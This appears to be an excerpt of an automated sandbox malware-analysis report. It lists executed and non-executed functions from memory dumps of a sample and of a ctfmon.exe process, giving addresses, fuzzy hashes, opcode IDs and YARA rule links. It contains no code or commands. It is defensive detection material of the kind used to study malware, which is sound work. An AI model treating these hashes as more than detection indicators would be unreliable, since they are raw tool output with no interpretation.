Instruction ID: 16a20d5d1f14a9cf875be5b0218804c045f1b3bd9898e895d2f73d3f9cd8a0cf
Opcode Fuzzy Hash: dc0320fddf887d4cb9f89a615ede717bb0e45e7e2153b953a923008933622dd8
Instruction Fuzzy Hash: 3DD09210E5F6A7D5FA684705C1602B965A0AF16301E20843AE05F428C2CD1EF9096A81

Function 00007FFAAC7B63CD Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1303454988.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f575da98855b8b65d5620e918e229f75f3e8edbf06a268c511038ebdd42212
Instruction ID: 8c03f749179f6709e2274310f9f8df052d336ef5f8313ec32e550745a8364386
Opcode Fuzzy Hash: 89f575da98855b8b65d5620e918e229f75f3e8edbf06a268c511038ebdd42212
Instruction Fuzzy Hash: 99C04C51F1991F47F2556328803577D08565F85748F5484F5E00EC66D6CE1C590203CA

Function 00007FFAACBB6AB5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction ID: d8d852119701a2489411b57a6af2f9cc6f6a45167a952a4a29d64a3cd45eb51c
Opcode Fuzzy Hash: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction Fuzzy Hash: 85C04C30204914DFD788DB0DC0D463873D1EF5E301B5040B4E04ECB2A6C529DC499710

Function 00007FFAAC7B06D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1303454988.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf5d805de2e92f06ac4483289a5bcde691937bd6aba2715eae8f79235abd674
Instruction ID: 89e03ea68ce13c853127ffbea1072dd3a2e824fe26f6f815f8ce1444eb9bcb24
Opcode Fuzzy Hash: 8cf5d805de2e92f06ac4483289a5bcde691937bd6aba2715eae8f79235abd674
Instruction Fuzzy Hash: 85B01210C6B44F40F408337B0842074B4706B46108FC48170D80E40183984D509C02C2

Function 00007FFAACBBDAC3 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305936393.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaacbb0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6073f0337aa33c7a6ec8d08be4d74b9cc3d0df835d4a81f24734d80f07419bc9
Instruction ID: d76e6113fde6338679c7c12c991ab5f04d1263b81ab3343f3acc8455ff51147e
Opcode Fuzzy Hash: 6073f0337aa33c7a6ec8d08be4d74b9cc3d0df835d4a81f24734d80f07419bc9
Instruction Fuzzy Hash: CFB01200F0E223D3B52002B09C5003C00404B07201B50C530D30F4D1C7EC8EB80853D0

Function 00007FFAAC7B2D4D Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1303454988.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction ID: e919c89461e562be8da969277301567e5c23d6b4f7eac321d2307d83f33f8d52
Opcode Fuzzy Hash: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction Fuzzy Hash:

Non-executed Functions

Function 00007FFAAC7B0E43 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1303454988.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac7b0000_VIyu4dC9CU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fb4010f28df6e0210f8970aad5d0bed26dd61bde3a61d9fbd9c915711c9e16d
Instruction ID: 910068443da20015ba4210f0092ea5f071f2e2ca0ff46c87cf98228d3217656c
Opcode Fuzzy Hash: 2fb4010f28df6e0210f8970aad5d0bed26dd61bde3a61d9fbd9c915711c9e16d
Instruction Fuzzy Hash: 7551C4B1A18A598EE399DB9CC8A97B87FE1FB86314F5041BEC00ED67D2CB7854248740

Analysis Process: ctfmon.exePID: 4828, Parent PID: 7984COMMON

Executed Functions

Function 00007FFAAC7D0D47 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

5X_H, xrefs: 00007FFAAC7D0DF3

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID: 5X_H
API String ID: 0-3241812158
Opcode ID: ae36213d38f86fe873cf8e435a7daf82d2f2a15ddd998a8f49a538a701a5539a
Instruction ID: b1152753e6bfb5bf5bee9754bc7cf7f0d9a5b6d658a1ca77dc7312e3797f095a
Opcode Fuzzy Hash: ae36213d38f86fe873cf8e435a7daf82d2f2a15ddd998a8f49a538a701a5539a
Instruction Fuzzy Hash: C691E27691CA8D8FE78ADB6C88697F87FE1FB96300F0440AFC049D76E2CA7854148741

Function 00007FFAACBDA0B2 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

, xrefs: 00007FFAACBDA122

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c2f971002335827da1aa030f73f63899311ab0aaf42424e486a850b3a5b32e04
Instruction ID: b5b9d8a37029601f992a36ef3f386cc842ed11e4ffdf2a64b3242d59e915978f
Opcode Fuzzy Hash: c2f971002335827da1aa030f73f63899311ab0aaf42424e486a850b3a5b32e04
Instruction Fuzzy Hash: CA516570D0965EDFEB5ADB98C4956BCB7B1FF45300F10807AC00EEB691DA39A945CB90

Function 00007FFAACBD4A48 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

, xrefs: 00007FFAACBD4AB2

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 0e0a037eefa3af3ebfdbc8bb36dbcbbe3c022243c8743e8a668750b6a522418f
Instruction ID: 9fbd49714f8d602aaacee45fbcdb7ac4b65f8bfbf3e8d63555b988f6e3743631
Opcode Fuzzy Hash: 0e0a037eefa3af3ebfdbc8bb36dbcbbe3c022243c8743e8a668750b6a522418f
Instruction Fuzzy Hash: EB514B71D0961ACFEB59DB98C4556FDB7B1EF45300F1080BAD00EEB686CE39A905CB84

Function 00007FFAACBDB360 Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 674481009a494a0efc8782411743cbcb4d31ee084184d49d877c450e096a48d8
Instruction ID: ed5de929411d8f00e0855dfa0582028c4e15388a4d513e4d57a06f4d56463ec9
Opcode Fuzzy Hash: 674481009a494a0efc8782411743cbcb4d31ee084184d49d877c450e096a48d8
Instruction Fuzzy Hash: A5E1E23091EA16CFF36ADB28D49067577E1FF46314B10857ED44ECB682DA2AF84A8781

Function 00007FFAACBD4CAF Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad03839b5416cc04f2a7aff05350638ac75aa81cec87621bdfb31d16b5ff468
Instruction ID: 48afb71ab384ea15cb64c6878f7ee57dd6c01c662969c4304546e99f58c78076
Opcode Fuzzy Hash: 5ad03839b5416cc04f2a7aff05350638ac75aa81cec87621bdfb31d16b5ff468
Instruction Fuzzy Hash: 40F1B270519556CFEB5ACF18C4D06B537A1FF49310B5481BEC84FCB68ACA39E889CB81

Function 00007FFAACBD5CF1 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbb9fd394ed3f4b2e4a2fb33ab0bdedb03dbc311bad8710bf027ebe60e1092bd
Instruction ID: 51bd38e0e78c8767513a73fe040095cf62a0c8f529b99c4313968a07ab5e4497
Opcode Fuzzy Hash: cbb9fd394ed3f4b2e4a2fb33ab0bdedb03dbc311bad8710bf027ebe60e1092bd
Instruction Fuzzy Hash: C2E1C47090EA16CFEB6ADB28D48067577E1FF45310B14857FC44ECB592DA2AF84A8781

Function 00007FFAACBD4CCF Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07e12af9f6bb23a1d7e2f38091981f1d064a0410aa579ffb1262f58254c17950
Instruction ID: 971530d467920ebe73d8f717f0cc48e34a05e5b436dd1f538852f6eaecde46dc
Opcode Fuzzy Hash: 07e12af9f6bb23a1d7e2f38091981f1d064a0410aa579ffb1262f58254c17950
Instruction Fuzzy Hash: 95C1807051A566CBEB0ACF18D4D06B537A1FF46310B5485BEC84F8F68BCA39E849CB81

Function 00007FFAACBD4562 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d813ef1bbb255626e483bdc98411fcc1e5316805da5d7dc36a89ea1bccc15edd
Instruction ID: daf6d6dbf4c7cf4dd78d9ec86764fb58a47f4d1c97c2ce015bcec6da248cd003
Opcode Fuzzy Hash: d813ef1bbb255626e483bdc98411fcc1e5316805da5d7dc36a89ea1bccc15edd
Instruction Fuzzy Hash: 3DC19370919A968FE74ADB18C0907E4BBA1FF56310F54817AC44ECBA86DF29F8558BC0

Function 00007FFAACBD9C2A Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e15b56e639545b7b172796dfec27609ad10cdfde5787d52155333ca31e0ffb
Instruction ID: e662d2ebacc05e177b7d58959697b7e24a908cf3334119a8bb75fee6b81499c1
Opcode Fuzzy Hash: c3e15b56e639545b7b172796dfec27609ad10cdfde5787d52155333ca31e0ffb
Instruction Fuzzy Hash: ADC1B57090DA569FE74ADB64C0917A4B7A1FF46300F5481BAC04ECBA86EF29F855C7C1

Function 00007FFAACBD9375 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff769cce1a07a27294b7204c1790d8f8a3f91ceaa8e984cec34631070371283
Instruction ID: 021fb5141f3b0b242ef5739b003bb00ff015702beed938141cb107ed329ece37
Opcode Fuzzy Hash: 7ff769cce1a07a27294b7204c1790d8f8a3f91ceaa8e984cec34631070371283
Instruction Fuzzy Hash: 33912631E0D7558FE31A9F28D8952B67BD0EF86311B14857FE48ECB193EE25A8068781

Function 00007FFAACBD7617 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ae3ad0e739d3f33a992ece2aaf72154704e6e418608be7e2676c1fdadd1e7a
Instruction ID: 690731ac18490454106ce1fa34ca6def1c39b2eb595209c3d8e9994926679e02
Opcode Fuzzy Hash: 17ae3ad0e739d3f33a992ece2aaf72154704e6e418608be7e2676c1fdadd1e7a
Instruction Fuzzy Hash: FF210A12D0E663DBF23A5769E4512F86B406F06312F1481B7D08E9F4C6DD0FE48993D2

Function 00007FFAACBDC5B7 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dba871d0898a78089923fd058258691c18a783e9adedc1c158ac97afd341909
Instruction ID: dfacbb0409ef54a632780e53afc3ebf3cd134ebb93e3bd9d6d1e0dc2fd707e70
Opcode Fuzzy Hash: 6dba871d0898a78089923fd058258691c18a783e9adedc1c158ac97afd341909
Instruction Fuzzy Hash: CD31C212E1F1A3C6F5366768E416AF86B509F56326F24817BC54E8E4C2CD0FE88E43C2

Function 00007FFAACBD1F47 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96011613eca65e1ae562d93f0f06d73ff38871886beff6ccb5dcb16a7235aa88
Instruction ID: 306edcafc13714340ec566bf12217cbcc2b88ddc98b4e23df1a506b1f3b28dea
Opcode Fuzzy Hash: 96011613eca65e1ae562d93f0f06d73ff38871886beff6ccb5dcb16a7235aa88
Instruction Fuzzy Hash: DA210692D8E2E3CAF2AA5364D8512BC5A509F43310F28C1B7D65D8E5C2CD0EAC4D13D3

Function 00007FFAACBDA43A Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e9d709177882cba7554c1ab68874025c7497bcab8be3cec665d916d6c6d9f1f
Instruction ID: c31c2b2590e5875a11bfb149c0d79b1c026fc518487120c5ff052da8191074fd
Opcode Fuzzy Hash: 9e9d709177882cba7554c1ab68874025c7497bcab8be3cec665d916d6c6d9f1f
Instruction Fuzzy Hash: 0BB17F3051A566CBEB4ACF18C0D46B437A1FF55310B5496BED84F8F68ADA39F885CB80

Function 00007FFAACBD9116 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2b89e1095d4342c5704e6ee55a319adecaaf9adc9931774acb55250b2b8200e
Instruction ID: 3bde882616d4763fbf8946e2b67c04ea433afef0e071a977522d91831edd1ca6
Opcode Fuzzy Hash: a2b89e1095d4342c5704e6ee55a319adecaaf9adc9931774acb55250b2b8200e
Instruction Fuzzy Hash: 7381F431D0E626CFF36A5B24D44527577E1EF46324B14857FD08F8B582EE2AF80A8781

Function 00007FFAACBD3A96 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af7da6ea8a3fd69639844b164b3243aa6b3d0648f331a5be43afe802f1ba14cd
Instruction ID: a64e8d024a867916046775ba66de3a657145edaa485c2fc71e4d06d3f1da2ced
Opcode Fuzzy Hash: af7da6ea8a3fd69639844b164b3243aa6b3d0648f331a5be43afe802f1ba14cd
Instruction Fuzzy Hash: CA81E27194EB528FF36A5B2CE44527577E0EF46350B18847FD48FCA1C3DA2AE80A8781

Function 00007FFAACBD1BF9 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c2dde0dcbca55cc9c166253df6a406fda0b9c9f47a499002ed1efc9f5788bbc
Instruction ID: 4e8e41674d33def6f02151eeb5ea8dd8c5b20ef5cf0f9ab9b725f378e2c1fa24
Opcode Fuzzy Hash: 8c2dde0dcbca55cc9c166253df6a406fda0b9c9f47a499002ed1efc9f5788bbc
Instruction Fuzzy Hash: 1B71283590E5698FF76ADB18D4566B437C0FF46320B1442BAD05ECF572DA1AE81E83C1

Function 00007FFAACBD02B9 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4097a086aacfaab0a0b20fba56a8ee73306017b085f9a96b3a56edbd48b6fe5a
Instruction ID: d61845e4eb3dafeaae593a9c3346a02e52ab1f3e5fd3ee239dd646f01fe9bf73
Opcode Fuzzy Hash: 4097a086aacfaab0a0b20fba56a8ee73306017b085f9a96b3a56edbd48b6fe5a
Instruction Fuzzy Hash: EA71483190E559CFF36ADB18E4966B637D0FF4A320B0442BAD09ECB552D91AE80E87C1

Function 00007FFAACBD72C9 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca16d064dbc9b8308d5e70ed155e1bcaee99c4d5eda3953f429a66918c9dcc7
Instruction ID: a3cca3edf30c7d29e8d4dcbf2f0f20e9d6d3812a630dfde1fe913bf7cbebfc28
Opcode Fuzzy Hash: cca16d064dbc9b8308d5e70ed155e1bcaee99c4d5eda3953f429a66918c9dcc7
Instruction Fuzzy Hash: C771453090E859CFF36ADB18C8066F53BC0EF46321B1042BAD48ECB596D91AE84F87C1

Function 00007FFAACBDC269 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f79885bd8026b2c04a95d7aa7c19c4210d6287f46ccaf5f1a3ba21189e91b9f
Instruction ID: a3648586f42a87ea4035c1e0e9fd0fe2c0b8c89b725bf7519a5481fce118e772
Opcode Fuzzy Hash: 9f79885bd8026b2c04a95d7aa7c19c4210d6287f46ccaf5f1a3ba21189e91b9f
Instruction Fuzzy Hash: B271253190E559CFF76ADB18C4466B637D0FF46320B1442BAD05ECB592DE2AE81E87C2

Function 00007FFAACBD27BB Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81764c0fab72bba11354839d9e76ba6044bbce39af5768613cee5b8022325c01
Instruction ID: 0b9b049218f77e50963cdbc930d349c1e1972e046f45bd714890c79138629a28
Opcode Fuzzy Hash: 81764c0fab72bba11354839d9e76ba6044bbce39af5768613cee5b8022325c01
Instruction Fuzzy Hash: E281B130D1959ACFFB9ADB68C8546BCBBB0FF4A300F10457AD00EDB191DE2AAC458781

Function 00007FFAACBDCE2B Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6bc0ba2e4316903c567481a088dec4dfd639dc0fe8627905a9a5d15783229c
Instruction ID: 413c849ba06601978e44d801f0ad981edd82b9b923b447bd82a96719254442f4
Opcode Fuzzy Hash: 9c6bc0ba2e4316903c567481a088dec4dfd639dc0fe8627905a9a5d15783229c
Instruction Fuzzy Hash: FF71AF71D1955ADFFB56DB68C8546FC7BA0EF4A300F20857AD00EDB191DE39A84A8780

Function 00007FFAACBD7E8B Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb65c2e8331167660b9b714a0e8e5d5136a8b81d883012fd5b62a71e2ab7bfd2
Instruction ID: 362490c545a0aba740f11e496426c4bf34f2cd2067e65aad24938259392f945d
Opcode Fuzzy Hash: cb65c2e8331167660b9b714a0e8e5d5136a8b81d883012fd5b62a71e2ab7bfd2
Instruction Fuzzy Hash: 5871C031D1D69ACFFB66DB64C8556FC7BA0EF46300F1084BAD00EEB195DA2AA845C781

Function 00007FFAACBDA31F Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc682f22c2a171fc355602f9750d70eaff082d31004024ac06b6900501b72bc
Instruction ID: 605c72eccca54d12ff6a644c6049415c655fce18dbcc294608740f8a1c08dc17
Opcode Fuzzy Hash: ebc682f22c2a171fc355602f9750d70eaff082d31004024ac06b6900501b72bc
Instruction Fuzzy Hash: FC81123091D665CFEB5ACF18C4947B57BA1FF52300F0885BAD04E8F58ADA38E849CB81

Function 00007FFAACBDA33F Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0e99729632dab7a01ea4c2296197249c44fb32d07dd87046432de7acd44e181
Instruction ID: 58d6beca676054d3f444bd3533edc8f152a1a618ae1f1c6541e9108f504c2f27
Opcode Fuzzy Hash: d0e99729632dab7a01ea4c2296197249c44fb32d07dd87046432de7acd44e181
Instruction Fuzzy Hash: ED51B03091E666CBFB1E8F18C4A46723BA1FF52310B5885BED44F8F58BDA29E445C781

Function 00007FFAACBDBDC1 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091add02514bd751cda7e16a4bc0a6617f976daa28779468ca079bd95df187c2
Instruction ID: 398ded09a117df50a3882f60d56587ff8f1bdaca404afb87c2079ae31d449480
Opcode Fuzzy Hash: 091add02514bd751cda7e16a4bc0a6617f976daa28779468ca079bd95df187c2
Instruction Fuzzy Hash: 7841F621A4E967CFF75A9728C455AB537D1EF46300B2484BBD10ECB6D2CD2AE84687C1

Function 00007FFAACBD0D48 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 068f3216f09bb59c5f2badd06486018901d1d716f361de269c2ac2f93b420776
Instruction ID: 2b3ad50bf107a9f3b64c7a010d9c9e77be38394f5ca2431d1689872bd2790c11
Opcode Fuzzy Hash: 068f3216f09bb59c5f2badd06486018901d1d716f361de269c2ac2f93b420776
Instruction Fuzzy Hash: E841D3A390922257FA35BBBCF46A4E177909F0233A708D177C0CDCE663EC18A4C79685

Function 00007FFAACBD0889 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e7de58fb83da6de2d878766fe48c53651a3e2e3fdc431744b9e03d7add7c59
Instruction ID: d6a918451c69c72a401e1e255d742d8eae0433bb680c21303ad475ce0b591cef
Opcode Fuzzy Hash: a8e7de58fb83da6de2d878766fe48c53651a3e2e3fdc431744b9e03d7add7c59
Instruction Fuzzy Hash: 2A51372191D56A8FF76A8768D4647F877A1EF56310F14C1BBC08ECF582CD29A8898BC1

Function 00007FFAAC7D08D0 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e24cd580e34bab19979bddb74ac66c1ead6d62d82ab4bf6a70e3d4421f7372
Instruction ID: 2359e3036690a80fdd12ebd0c8b336957e97af9f4e73b69c4a3878be6716e47a
